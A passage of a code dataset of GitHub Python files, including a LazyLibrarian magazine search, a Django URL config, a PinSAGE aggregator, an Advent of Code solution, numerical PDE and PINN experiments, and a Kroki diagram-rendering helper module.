results['Status']\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tstatus = \"Skipped\"\n\n\t\t\t\t\t\tcontrolValueDict = {\"NZBurl\": nzburl}\n\t\t\t\t\t\tnewValueDict = {\n\t\t\t\t\t\t\t\"NZBprov\": nzbprov,\n\t\t\t\t\t\t\t\"BookID\": bookid,\n\t\t\t\t\t\t\t\"NZBdate\": nzbdate,\n\t\t\t\t\t\t\t\"NZBtitle\": nzbtitle,\n\t\t\t\t\t\t\t\"AuxInfo\": newdatish,\n\t\t\t\t\t\t\t\"Status\": status,\n\t\t\t\t\t\t\t\"NZBsize\": nzbsize\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\tmyDB.upsert(\"wanted\", newValueDict, controlValueDict)\n\t\t\t\t\t\t#print nzbtitle_formatted\n\t\t\t\t\t\t#print newdatish\n\n\t\t\t\t\t\tif control_date is None:\n\t\t\t\t\t\t\tmyDB.upsert(\"magazines\", {\"LastAcquired\": nzbdate, \"IssueDate\": newdatish}, {\"Title\": bookid})\n\t\t\t\t\t\t\tmaglist.append({\n\t\t\t\t\t\t\t\t'bookid': bookid,\n\t\t\t\t\t\t\t\t'nzbprov': nzbprov,\n\t\t\t\t\t\t\t\t'nzbtitle': nzbtitle,\n\t\t\t\t\t\t\t\t'nzburl': nzburl\n\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\t\tnew_date = new_date + 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcomp_date = formatter.datecompare(newdatish, control_date)\n\t\t\t\t\t\t\tif comp_date > 0:\n\t\t\t\t\t\t\t\tmyDB.upsert(\"magazines\", {\"LastAcquired\": nzbdate, \"IssueDate\": newdatish}, {\"Title\": bookid})\n\t\t\t\t\t\t\t\tmaglist.append({\n\t\t\t\t\t\t\t\t\t'bookid': bookid,\n\t\t\t\t\t\t\t\t\t'nzbprov': nzbprov,\n\t\t\t\t\t\t\t\t\t'nzbtitle': nzbtitle,\n\t\t\t\t\t\t\t\t\t'nzburl': nzburl\n\t\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\t\t\tnew_date = new_date + 1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tlogger.debug('This issue of %s is old; skipping.' % nzbtitle_formatted)\n\t\t\t\t\t\t\t\told_date = old_date + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tlogger.debug('NZB [%s] does not completely match search term [%s].' % (nzbtitle, bookid))\n\t\t\t\t\t\tbad_regex = bad_regex + 1\n\n\t\t\tlogger.info('Found %s NZBs for %s. %s are new, %s are old, and %s have bad date formatting' % (total_nzbs, bookid, new_date, old_date, bad_regex) )\n\treturn maglist\n","repo_name":"relder251/LazyLibrarianRefresh","sub_path":"lazylibrarian/searchmag.py","file_name":"searchmag.py","file_ext":"py","file_size_in_byte":7993,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"28908027138","text":"from django.urls import path\nfrom .views import homepage, AutoreDetailAL, AutoreListAL, LibroDetailAL, LibroListAL\n\napp_name = 'libreria'\nurlpatterns = [\n path('', homepage, name='libreria_home'),\n path('libri/', LibroListAL.as_view(), name='libri_list'),\n path('libri//', LibroDetailAL.as_view(), name='libro_detail'),\n path('autori/', AutoreListAL.as_view(), name='autori_list'),\n path('autori//', AutoreDetailAL.as_view(), name='autore_detail'),\n]\n","repo_name":"Agostoner02/progetto1","sub_path":"libreria/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"575787749","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom typing import Dict, List, Tuple\n\n\nclass Aggregator(nn.Module):\n\n def __init__(self, input_dim, output_dim):\n super(Aggregator, self).__init__()\n self.linear_layer = nn.Linear(\n in_features=input_dim,\n out_features=output_dim\n )\n self.input_dim = input_dim\n self.output_dim = output_dim\n\n\n def forward(self, neighbors: List[Tuple[int, float]], features_map: Dict[int, torch.Tensor]) -> torch.Tensor:\n \"\"\"\n :param neighbors: List[Tuple[int, float]], a list of neighbor nodes along with the weights\n :param embeddings: mappings from each of the node id to its embedding\n :return: aggregated embedding\n \"\"\"\n neighbor_indices = [v for v, _ in neighbors]\n weights = torch.tensor([w for _, w in neighbors])\n weights = weights / weights.sum()\n id2node = {i: v for i, (v, w) in enumerate(neighbors)}\n\n n_neighbors = len(neighbors)\n if n_neighbors == 0:\n return torch.zeros(self.input_dim)\n\n assert features_map[neighbor_indices[0]].size(0) == self.input_dim\n hiddens = torch.zeros(n_neighbors, self.output_dim)\n\n for i, v in id2node.items():\n hiddens[i] = F.relu(self.linear_layer(features_map[v]))\n\n \"\"\"\n hiddens: (n_nodes, output_dim)\n hiddens.unsqueeze(1): (n_nodes, 1, output_dim)\n \n weights: (n_nodes,)\n weights.unsqueeze(1).unsqueeze(1): (n_nodes, 1, 1)\n \n *: element-wise multiplication\n \n hiddens.unsqueeze(1) * weights.unsqueeze(1).unsqueeze(1): (n_nodes, 1, output_dim)\n \n \"\"\"\n agg = (hiddens.unsqueeze(1) * weights.unsqueeze(1).unsqueeze(1)).squeeze(1) # (n_nodes, output_dim)\n agg = agg.sum(dim=0, keepdim=False)\n\n return agg\n\n\ndef test_aggregator():\n neighbors = [(3, 0.3), (1, 0.1), (4, 0.4)]\n\n V = 5\n feat_dim = 20\n weights = torch.randn(size=(V, feat_dim))\n\n embeddings = nn.Embedding(\n num_embeddings=V,\n embedding_dim=feat_dim\n )\n embeddings.weight = torch.nn.Parameter(weights)\n embeddings.weight.requires_grad = False\n\n features_map = {v: embeddings(torch.tensor(v)) for v, prob in neighbors}\n\n aggregator = Aggregator(input_dim=feat_dim, output_dim=3)\n n = aggregator(neighbors, features_map)\n print('input:')\n print(embeddings)\n print('\\n\\noutput:')\n print(n)\n\nif __name__ == '__main__':\n test_aggregator()\n\n\n\n\n\n","repo_name":"cheng-w-liu/computational-notes","sub_path":"Deep_Learning_algorithms_test/PinSAGE_PyTorch/aggregators.py","file_name":"aggregators.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71484339367","text":"import os\nfrom typing import Dict\nfrom task1 import parse_input\n\ndef calculate_answer(bags: Dict[str, Dict[str, int]], color: str) -> int:\n return get_contained_bags(bags, color)\n\ndef get_contained_bags(bags: Dict[str, Dict[str, int]], color: str) -> int:\n bags_contained = 0\n for k, v in bags[color].items():\n bags_contained += v * (1 + get_contained_bags(bags, k))\n return bags_contained\n\nif __name__ == \"__main__\":\n dir_path = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(dir_path, 'input.txt')\n bags = parse_input(file_path)\n answer = calculate_answer(bags, \"shiny gold\")\n print(answer)","repo_name":"nagybalint/advent-of-code-2020","sub_path":"day_7/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27600574114","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2019/6/25 18:57\n# @File : p11_naming_slice.py\n# @Software: PyCharm\n\n\"\"\"\n命名切片\n\n代码中如果出现大量的硬编码会使得代码的可读性和可维护性大大降低。\n使用 slice() 可以使代码更加清晰可读。\n\"\"\"\n\n# 从一个记录(比如文件或其他类似格式)中的某些固定位置提取字段\nrecord = '....................100 .......513.25 ..........'\nSHARES = slice(20, 23)\nPRICE = slice(31, 37)\ncost = int(record[SHARES]) * float(record[PRICE])\nprint(cost)\n\n# 切片对象的用法\nitems = [0, 1, 2, 3, 4, 5, 6]\na = slice(2, 4)\nprint(items[a])\nitems[a] = [10, 11]\nprint(items)\ndel items[a]\nprint(items)\n\n# 获取切片对象的属性\na = slice(5, 50, 2)\nprint(a.start, a.stop, a.step)\n\n# 可以通过调用切片的 indices(size) 方法将它映射到一个已知大小的序列上。\n# 这个方法返回一个三元组 (start, stop, step) ,所有的值都会被缩小,直到适合这个已知序列的边界为止\na = slice(1, 50)\ns = 'HelloWorld'\nprint(a.indices(len(s)))\nfor i in range(*a.indices(len(s))):\n print(s[i])\n","repo_name":"mofei952/cookbook","sub_path":"c01_data_structures_and_algorithms/p11_naming_slice.py","file_name":"p11_naming_slice.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34255741761","text":"\"\"\"Solves a mixed-poisson problem using schur complement approach\nimplemented via built-in function calls to PETSc\"\"\"\n\n## Future-proofing for Python3+ ##\nfrom __future__ import print_function\n\n## Import preliminaries ##\nfrom dolfin import *\nfrom dolfin_adjoint import *\nfrom pfibs import *\nfrom pfibs.pfibs_adjoint import *\nimport dolfin as df\n\n## Create mesh ##\nmesh = UnitSquareMesh(40,40)\nV = FiniteElement(\"RT\",mesh.ufl_cell(),1)\nP = FiniteElement(\"DG\",mesh.ufl_cell(),0)\nW = FunctionSpace(mesh,V*P)\n(u,p) = TrialFunctions(W)\n(v,q) = TestFunctions(W)\nw = Function(W)\n\n## Weak formulation ##\nnu = Constant(5.0)\nf = Expression(\"10*exp(-nu*(pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2)) / 0.02)\", nu=nu, degree=2)\nf.dependencies = [nu]\nf.user_defined_derivatives = {nu: Expression(\"10*exp(-nu*(pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2)) / 0.02)*(-1*(pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2)) / 0.02)\", nu=nu, degree=2)}\na = (dot(v,u) + div(v)*p + q*div(u))*dx\nL = -q*f*dx\n\n## Boundary conditions ##\nclass BoundarySource(UserExpression):\n def __init__(self, mesh, **kwargs):\n super().__init__(self,**kwargs)\n self.mesh = mesh\n def eval_cell(self, values, x, ufc_cell):\n cell = Cell(self.mesh, ufc_cell.index)\n n = cell.normal(ufc_cell.local_facet)\n g = sin(5.0*x[0])\n values[0] = g*n[0]\n values[1] = g*n[1]\n def value_shape(self):\n return (2,)\ndef boundary(x):\n return x[1] < DOLFIN_EPS or x[1] > 1.0 - DOLFIN_EPS\n\nG = BoundarySource(mesh, degree=2)\nbc = DirichletBC(W.sub(0), G, boundary)\n\n## Setup block problem ##\nproblem = BlockProblem(a,L,w,bcs=bc)\n\n## Built-in function calls ##\nproblem.field('u',0,solver={\n 'ksp_type':'preonly',\n 'pc_type':'bjacobi'\n})\nproblem.field('p',1,solver={\n 'ksp_type':'preonly',\n 'pc_type':'hypre'\n})\nproblem.split('s1',['u','p'],solver={\n 'ksp_type':'gmres',\n 'pc_fieldsplit_type':'schur',\n 'pc_fieldsplit_schur_fact_type':'upper',\n 'pc_fieldsplit_schur_precondition':'selfp',\n 'ksp_monitor_true_residual':True\n})\n\n## Setup block solver ##\nsolver = LinearBlockSolver(problem)\n\n## Solve problem ##\ntimer = Timer(\"Solve Problem\")\nsolver.solve()\ntimer.stop()\n\nlist_timings(TimingClear.keep, [TimingType.wall])\n\n(u,p) = w.split()\nG = assemble(dot(u,u)*dx)\nh = Constant(1)\nG_hat = ReducedFunctional(G, Control(nu))\nconv_rate = taylor_test(G_hat, nu, h)\n","repo_name":"NREL/pfibs","sub_path":"demo/documented/mixed-poisson/demo_mp-adjoint.py","file_name":"demo_mp-adjoint.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"40098123169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 24 16:44:59 2021\n\n@author: rober\n\"\"\"\n\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Callable, List\n\nfrom tqdm import tqdm\n\nfrom src.config import results_path\nfrom experiments.BaseExperiment import BaseExperiment\nfrom experiments.Models.VanillaPinn import VanillaBoundaryOperator, VanillaOperator\nfrom lib.IntelligentModels.NNFlow import NNFlow\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy.random import normal\n\nfrom experiments.utils import plot_predictions, Potencial, g, n\nfrom experiments.Models.parameters import EPSILON, alpha, k, potential, n_train_r, \\\n r_weight_proportion, domain_to_predict, num_repetitions, \\\n exact_solution_function\n\nfrom lib.DifferentialEquations.DifferentialEquation import Condition, DifferentialEquation\nfrom lib.IntelligentModels.BaseModelFlow import BaseModelFlow\nfrom lib.PINN_models.PinnFlow import PinnFlow\nfrom lib.utils import Bounds\n\n\nclass VanillaCurriculumPinn(BaseExperiment):\n def __init__(self, num_epsilons: int, epsilon: float, potential: Potencial, g: Callable, alpha: float, k: float,\n n: Callable, loss_metric=\"l2\"):\n self.num_epsilons = num_epsilons\n self.loss_metric = loss_metric\n self.epsilon = epsilon\n self.potential = potential\n self.g = g\n self.alpha = alpha\n self.k = k\n self.n = n\n\n def experiment(self, n_samplings: int, n_train_r: int, r_weight_proportion: float,\n max_samplings: int, n_iters_per_sampling: int,\n coords2predict: np.ndarray, x_bounds: Bounds,\n intelligent_model: Callable[[], BaseModelFlow], **kwargs) -> List[np.ndarray]:\n # --------- core experiment --------- #\n num_per_dim2pred = len(coords2predict)\n sampler = partial(np.random.uniform, x_bounds.lower, x_bounds.upper)\n sampler = partial(np.linspace, x_bounds.lower, x_bounds.upper)\n boundary_condition = Condition(\n operator=VanillaBoundaryOperator(g=self.g, alpha=self.alpha, k=self.k, n=self.n),\n function=lambda x: 0 * x,\n sampling_strategy=[\n (\"x\", partial(np.linspace, x_bounds.lower, x_bounds.upper))\n ],\n valid_sampling_strategy=[\n (\"x\", partial(np.linspace, x_bounds.lower, x_bounds.upper))\n ],\n n_train=2\n )\n\n for i, epsilon in tqdm(enumerate(np.logspace(np.log10(self.epsilon), np.log10(0.05), self.num_epsilons)[::-1]),\n # for i, epsilon in tqdm(enumerate(np.linspace(self.epsilon, 0.05, self.num_epsilons)[::-1]),\n\n desc=\"Doing curriculum learning PINN\"):\n residuals = Condition(\n operator=VanillaOperator(epsilon=epsilon, potential=self.potential),\n function=lambda x: 0 * x,\n sampling_strategy=[\n (\"x\", sampler)\n ],\n valid_sampling_strategy=[\n (\"x\", partial(np.random.uniform, x_bounds.lower, x_bounds.upper))\n ],\n n_train=n_train_r\n )\n\n differential_equation = DifferentialEquation(\n name=\"DifferentialEquation\",\n domain_limits=[(\"x\", x_bounds)],\n boundary_condition=boundary_condition,\n residuals=residuals\n )\n\n pinn = PinnFlow(\n model=intelligent_model() if i == 0 else pinn.model,\n differential_equation=differential_equation,\n loss_metric=self.loss_metric,\n n_iters_per_sampling=n_iters_per_sampling,\n max_samplings=max_samplings,\n weight_proportion={\n \"boundary_condition\": 1 - r_weight_proportion,\n \"residuals\": r_weight_proportion\n },\n initialize=True if i == 0 else False\n )\n\n pinn.fit()\n\n # --------- processing data to save experiment --------- #\n u_predictions = pinn.predict(domain=coords2predict, which=\"u\").reshape((num_per_dim2pred))\n pinn.free_tf_session()\n del pinn\n # tf.get_default_graph().finalize()\n\n return [u_predictions]\n\n\nif __name__ == \"__main__\":\n experiment_path = Path.joinpath(results_path, 'VanillaCurriculumPINN')\n experiment_path.mkdir(parents=True, exist_ok=True)\n\n ve = VanillaCurriculumPinn(num_epsilons=5, epsilon=EPSILON, potential=potential, g=g, n=n, k=k,\n alpha=alpha, loss_metric=\"l2\")\n\n fig, ax = plt.subplots()\n for i in range(num_repetitions):\n u_predictions = ve.experiment(\n n_samplings=r_weight_proportion,\n n_train_r=n_train_r,\n r_weight_proportion=r_weight_proportion,\n max_samplings=1,\n n_iters_per_sampling=10000,\n coords2predict=domain_to_predict,\n x_bounds=Bounds(lower=0, upper=1),\n intelligent_model=lambda: NNFlow(hidden_layers=(2, 2),\n limit_zero=False), # True = NN*x(1-x)\n )\n\n plot_predictions(ax, coords2predict=domain_to_predict,\n exact_solution_function=exact_solution_function,\n u_predictions_best=u_predictions[-1],\n alpha=0.5 + 0.5 / num_repetitions)\n title = \"epsilon=\" + format(ve.epsilon) + \",iteration=\" + format(len(u_predictions)) + \",lambda\" + format(\n 1 - r_weight_proportion)\n plt.title(title)\n plt.savefig(\"{}/ApproxVSTrue.png\".format(experiment_path))\n plt.show()\n","repo_name":"agussomacal/ConDiPINN","sub_path":"src/experiments/Models/VanillaCurriculumLearning.py","file_name":"VanillaCurriculumLearning.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8531600009","text":"\"\"\"\n\"\"\"\n\nfrom pathlib import Path\n\nimport webbrowser\nimport sys, os\nimport base64\nimport zlib\nimport traceback\n\n\n__all__=[\"Diagram\", \"DrawItem\", \"DrawBase\", \"DiaModule\", \"list_dir\", \"load_module\"]\n\n\nKROKI = \"https://kroki.io/{type_name}/{render_type}/{hash}\"\n\nDIR_DESCRIPTION_FILE = \"__description__.py\"\n\nDIAGRAM_TYPES = {\n \"blockdiag\":\"BlockDiag\",\n \"bpmn\": \"BPMN\",\n \"bytefield\": \"Bytefield\",\n \"seqdiag\": \"SeqDiag\",\n \"actdiag\": \"ActDiag\",\n \"nwdiag\": \"NwDiag\",\n \"packetdiag\": \"PacketDiag\",\n \"rackdiag\": \"RackDiag\",\n \"c4plantuml\": \"C4 with PlantUML\",\n \"ditaa\": \"Ditaa\",\n \"erd\": \"Erd\",\n \"excalidraw\": \"Excalidraw\",\n \"graphviz\": \"GraphViz\",\n \"mermaid\": \"Mermaid\",\n \"nomnoml\": \"Nomnoml\",\n \"pikchr\": \"Pikchr\",\n \"plantuml\": \"PlantUML\",\n \"structurizr\": \"Structurizr\",\n \"svgbob\": \"Svgbob\",\n \"vega\": \"Vega\",\n \"vegalite\": \"Vega-Lite\",\n \"wavedrom\": \"WaveDrom\",\n}\n\n\nclass Diagram:\n \"\"\"\n Базовый клас диаграм\n \"\"\"\n _dia_types = {}\n\n @classmethod\n def register(cls, name, class_obj):\n cls._dia_types[name] = class_obj\n\n def __init__(self):\n \"\"\"\n \"\"\"\n\n def perp_url(self, draw, render_type=\"svg\"):\n code=draw._get_code()\n print(code)\n c = self.calc_code(draw._get_code())\n return KROKI.format(type_name=draw._type_name, render_type=render_type, hash=c)\n\n def open_in_browser(self, draw):\n \"\"\"\n \"\"\"\n webbrowser.open(self.perp_url(draw))\n\n def render_to_file(self, draw, fname, render_type=\"svg\"):\n import requests\n r = requests.get(self.perp_url(draw), stream=True)\n if r.status_code == 200:\n with open(fname, 'wb') as f:\n for chunk in r.iter_content(1024):\n f.write(chunk)\n else:\n print(r.status_code)\n r.close()\n\n def get_svg(self, draw):\n import requests\n r = requests.get(self.perp_url(draw), stream=True)\n if r.status_code == 200:\n res = bytearray()\n for chunk in r.iter_content(1024):\n res += chunk\n r.close()\n else:\n raise Exception(f\"Status: {r.status_code}\")\n return res\n\n def calc_code(self, txt):\n #import sys; import base64; import zlib; print(base64.urlsafe_b64encode(zlib.compress(sys.stdin.read().encode('utf-8'), 9)).decode('ascii'))\n res = base64.urlsafe_b64encode(zlib.compress(txt.encode('utf-8'), 9)).decode('ascii')\n return res\n\n def init_draw(self, draw_type):\n \"\"\"\n Возвращает объект \"рисовальщика\" соотвествующего типа\n \"\"\"\n dt = self._dia_types.get(draw_type)\n if not dt:\n return DrawBase(draw_type, self)\n else:\n return dt(draw_type, self)\n\n def display(self, draw, display=None):\n \"\"\"\n displays SVG in Jupytre notebook\n \"\"\"\n from IPython import display\n return display.SVG(self.get_svg(draw).decode(\"utf-8\"))\n\n @classmethod\n def display_code(cls, draw_type, code):\n \"\"\"\n Displays svg from code of type draw_type\n \"\"\"\n obj = cls()\n d = obj.init_draw(draw_type)\n d.code(code)\n return d\n\n\nclass DrawItem:\n base = None\n prefix = \"sate\"\n\n def __init__(self, sid=None):\n \"\"\"\n \"\"\"\n if not sid:\n self.state_id=self.base._get_id(prefix=self.prefix)\n else:\n self.state_id=sid\n\n\nclass DrawBase:\n \"\"\"\n Предоставляет методы генерации диаграмы, собирает результат\n \"\"\"\n\n def __init__(self, type_name, diagram):\n \"\"\"\n \"\"\"\n self._type_name = type_name\n self._plain_code = None\n self._buffer = []\n self._cur_level = 0\n self._indent_size = 4\n self._cur_id = 0\n self._diagram = diagram\n\n @property\n def code_0(self):\n return self._prep_item(DICode)\n\n @classmethod\n def register_item(cls, name, shortname=None):\n\n class _ItemDescr:\n def __init__(self, itm_cls):\n self.itm_cls=itm_cls\n def __get__(self, instance, owner):\n if instance:\n return instance._prep_item(self.itm_cls)\n else:\n return self.itm_cls\n\n def func(act_cls):\n setattr(cls, name, _ItemDescr(act_cls))\n if shortname:\n setattr(cls, shortname, _ItemDescr(act_cls))\n return act_cls\n\n return func\n\n def _prep_item(self, item_class):\n return type(item_class.__name__, (item_class,), {\"base\":self})\n\n def _set_code(self, code_text):\n self._plain_code=code_text\n\n def _get_id(self, prefix=None):\n if prefix is None:\n prefix = \"state\"\n self._cur_id += 1\n return \"{}_{}\".format(prefix, self._cur_id)\n\n def _add(self, code_line):\n \"\"\"\n Добавить строку кода в буфер\n \"\"\"\n self._buffer.append(self._set_indent(code_line))\n\n def _set_indent(self, code_line):\n if self._cur_level:\n return \" \"*(self._cur_level*self._indent_size) + code_line\n else:\n return code_line\n\n def _inc_level(self):\n \"\"\"\n \"\"\"\n self._cur_level += 1\n\n def _dec_level(self):\n \"\"\"\n \"\"\"\n if self._cur_level:\n self._cur_level -= 1\n\n def _get_code(self):\n if self._plain_code:\n return self._plain_code\n return \"\\n\".join(self._buffer)\n\n def _repr_svg_(self):\n \"\"\"\n \"\"\"\n return self._diagram.get_svg(self).decode(\"utf-8\")\n\n\n@DrawBase.register_item(\"code\")\nclass DICode(DrawItem):\n \"\"\"\n Элемент, содержащий код на языке диаграммы.\n ??Если присутствует то определяет всю диаграмму, игнорируя остальное\n \"\"\"\n\n def __init__(self, txt):\n \"\"\"\n \"\"\"\n self.base._set_code(txt)\n\n\n@DrawBase.register_item(\"template\", \"tmpl\")\nclass DITemplate(DrawItem):\n \"\"\"\n Элемент, содержащий код с расшираяемыми элементами шаблона.\n context::dict -- словарь данных, используемых в качестве конекста рендеринга.\n tmpl_lang::str -- идентификатор шаблонизатора, установленного в системе\n tmpl_id::str -- идентификатор шаблоного субблока. Для включения в главный шаблон.\n если задан - то самостоятельно не отображается, только через мастершаблон.\n sid::str -- идентификатор блока в схеме\n \"\"\"\n\n def __init__(self, txt, context=None, tmpl_lang=None, tmpl_id=None, sid=None):\n \"\"\"\n \"\"\"\n pass\n\n\ndef _dir_clear(base_dir, dir_path):\n base_dir = base_dir.rstrip(\"/\")\n if not dir_path or dir_path==\"/\":\n dir_path = \"\"\n elif not dir_path.startswith(\"/\"):\n dir_path = \"/\"+dir_path\n return base_dir, dir_path\n\n\ndef list_dir(base_dir, dir_path):\n \"\"\"\n Возвращает список файлов в куказанном каталоге.\n Модули python пытается импортировать и считать описание.\n Первый элемент в списке - описание самого каталога.\n\n Элементы списка: {name, title, dscription, detail, tags, dia_type, is_dir, do_link}\n \"\"\"\n #base_dir, dir_path = _dir_clear(base_dir, dir_path)\n #dirname = base_dir + dir_path\n\n base_dir = Path(base_dir) \n dir_path = Path(\"./\"+dir_path)\n dirname = base_dir / dir_path\n\n res = []\n dirs = []\n dir_descr = None\n for entry in dirname.iterdir():\n if str(entry).startswith('.'):\n continue\n if entry.name==DIR_DESCRIPTION_FILE:\n dir_descr = _proc_dir_descr(base_dir, entry)\n continue\n if entry.name.startswith('_'):\n continue\n if entry.suffix == \".py\":\n itm = _proc_module(base_dir, entry)\n elif entry.is_file():\n itm = dict(\n name=str(entry), \n title=entry.name, \n description=\"\", \n detail=None, \n tags=[], \n dia_type=None, \n is_dir=False,\n #link=dir_path + \"/\" + entry.name, \n link=None, \n )\n else:\n itm = _proc_subdir_descr(base_dir, entry)\n \"\"\"\n itm = dict(\n name=str(entry),\n title=entry.name, \n description=\"\", \n detail=None, \n tags=[], \n dia_type=None, \n is_dir=True,\n link=\"/\"+str(entry.relative_to(base_dir)), \n )\n \"\"\"\n if itm[\"is_dir\"]:\n dirs.append(itm)\n else:\n res.append(itm)\n\n return dirs+res, dir_descr\n\n\ndef load_module(in_file):\n \"\"\"\n Загружает и выполняет модуль. Возвращает словарь с объектами модуля.\n \"\"\"\n if isinstance(in_file, str):\n in_file = Path(in_file)\n if isinstance(in_file, Path):\n with in_file.open('r', encoding=\"utf-8\") as fm:\n buf = \"\".join([l for l in fm])\n module_name = in_file\n else:\n buf = in_file.read()\n module_name = \"\"\n\n mc = compile(buf, module_name, \"exec\")\n module = {}\n exec(mc, module)\n\n return module\n\n\nclass EModuleLoadError(Exception):\n pass\n\n\nclass EUnknownType(Exception):\n pass\n\n\nclass ENoDiagramCode(Exception):\n pass\n\n\nclass EDiagramProcessError(Exception):\n pass\n\n\nDEFAULT_TEMPLATE = \"\"\"\n

{title}

\n
{description}
\n
\n \n
\n
{detail}
\n\"\"\"\n\nclass DiaModule:\n \"\"\"\n Работа с python модулем диаграмм.\n \"\"\"\n\n def __init__(self, module_name, raise_errors=True, template=None):\n \"\"\"\n Загружает модуль из файла module_name\n \"\"\"\n\n self.error = None\n self.raise_errors = raise_errors\n self.diagram = None\n self.draw = None\n self.module_name = module_name\n self.module = load_module(module_name)\n if not template:\n self.template = DEFAULT_TEMPLATE\n else:\n self.template = template\n try:\n self.module = load_module(module_name)\n except Exception as e:\n traceback.print_exc()\n if raise_errors:\n raise EModuleLoadError(str(e))\n else:\n self.error = \"Ошибка загрузки модуля\"\n return\n\n self.dtype = self.module.get(\"DIAGRAM_TYPE\")\n if not self.dtype:\n if raise_errors:\n raise EUnknownType(\"Unknown diagram type\")\n else:\n self.error = \"Не задан тип диаграммы\"\n return\n\n self.draw_func = self.module.get(\"draw\")\n self.code_block = self.module.get(\"CODE\")\n if not (self.draw_func or self.code_block):\n if raise_errors:\n raise ENoDiagramCode(\"Unknown diagram type\")\n else:\n self.error = \"Не задан код диаграммы\"\n return\n\n def get_diagram(self):\n \"\"\"\n Генерирует диаграмму по данным модуля\n \"\"\"\n\n self.diagram = Diagram()\n try:\n d = self.diagram.init_draw(self.dtype)\n if self.draw_func:\n self.draw_func(d)\n else:\n d.code(self.code_block)\n except Exception as e:\n traceback.print_exc()\n if raise_errors:\n raise EDiagramProcessError(str(e))\n else:\n self.error = \"Ошибка при генерации: {}\".format(str(e))\n return\n\n self.draw = d\n return self.draw\n\n @property\n def title(self):\n return self.module.get(\"TITLE\", self.module_name)\n\n @property\n def description(self):\n return self.module.get(\"DESCRIPTION\", \"\")\n\n @property\n def detail(self):\n return self.module.get(\"DETAIL\", \"\")\n\n @property\n def image_url(self):\n if self.error:\n return None\n if not self.draw:\n self.get_diagram()\n if self.error:\n return None\n return self.diagram.perp_url(self.draw)\n\n @property\n def svg(self):\n \"\"\"\n Возвращает код SVG для дальнейшего использования\n \"\"\"\n if self.error:\n return None\n if not self.draw:\n self.get_diagram()\n if self.error:\n return None\n return self.diagram.get_svg(self.draw).decode(\"utf-8\")\n\n def display_svg(self):\n \"\"\"\n Отобразить в Jupyter только картинку (svg) диаграммы\n \"\"\"\n if self.error:\n return self.error\n svg = self.svg\n if self.error:\n return self.error\n from IPython import display\n return display.SVG(svg)\n\n def _repr_html_(self):\n self.get_diagram()\n if self.error:\n return '
Ошибка при генерации
'\n res = self.template.format(\n title=self.title,\n description=self.description,\n image_url=self.image_url,\n detail=self.detail)\n return res\n\n\ndef _proc_dir_descr(base_dir, entry):\n itm = dict(\n name=str(entry), \n title=entry.name,\n link=\"/\"+str(entry.relative_to(base_dir)),\n description=\"\", \n detail=\"\", \n tags=[], \n dia_type=None, \n is_dir=False,\n )\n \n try:\n module = load_module(entry)\n except Exception as e:\n traceback.print_exc()\n itm[\"link\"] = None\n itm[\"description\"] = \"== ошибка иморта ==\",\n return itm\n itm[\"title\"] = module.get(\"TITLE\", entry.name)\n itm[\"description\"] = module.get(\"DESCRIPTION\", \"\")\n itm[\"detail\"] = module.get(\"DETAIL\", \"\")\n\n return itm\n\n\ndef _proc_subdir_descr(base_dir, entry):\n entry_d = entry / Path(DIR_DESCRIPTION_FILE)\n itm = dict(\n name=str(entry), \n title=entry.name,\n link=\"/\"+str(entry.relative_to(base_dir)),\n description=\"\", \n detail=\"\", \n tags=[], \n dia_type=None, \n is_dir=True,\n )\n if entry_d.exists():\n try:\n module = load_module(entry_d)\n except Exception as e:\n traceback.print_exc()\n itm[\"link\"] = None\n itm[\"description\"] = \"== ошибка иморта ==\",\n return itm\n itm[\"title\"] = module.get(\"TITLE\", entry.name)\n itm[\"description\"] = module.get(\"DESCRIPTION\", \"\")\n itm[\"detail\"] = module.get(\"DETAIL\", \"\")\n\n return itm\n\n\ndef _proc_module(base_dir, entry):\n \"\"\"\n base_dir, entry::Path\n \"\"\"\n #base_dir, dir_path = _dir_clear(base_dir, dir_path)\n\n #in_file = base_dir + dir_path +\"/\" + entry.name \n\n\n itm = dict(\n name=str(entry), \n title=entry.name,\n link=\"/\"+str(entry.relative_to(base_dir)),\n description=\"\", \n detail=\"\", \n tags=[], \n dia_type=None, \n is_dir=False,\n )\n \n try:\n module = load_module(entry)\n except Exception as e:\n traceback.print_exc()\n itm[\"link\"] = None\n itm[\"description\"] = \"== ошибка иморта ==\",\n return itm\n itm[\"title\"] = module.get(\"TITLE\", entry.name)\n itm[\"description\"] = module.get(\"DESCRIPTION\", \"\")\n itm[\"detail\"] = module.get(\"DETAIL\", \"\")\n\n return 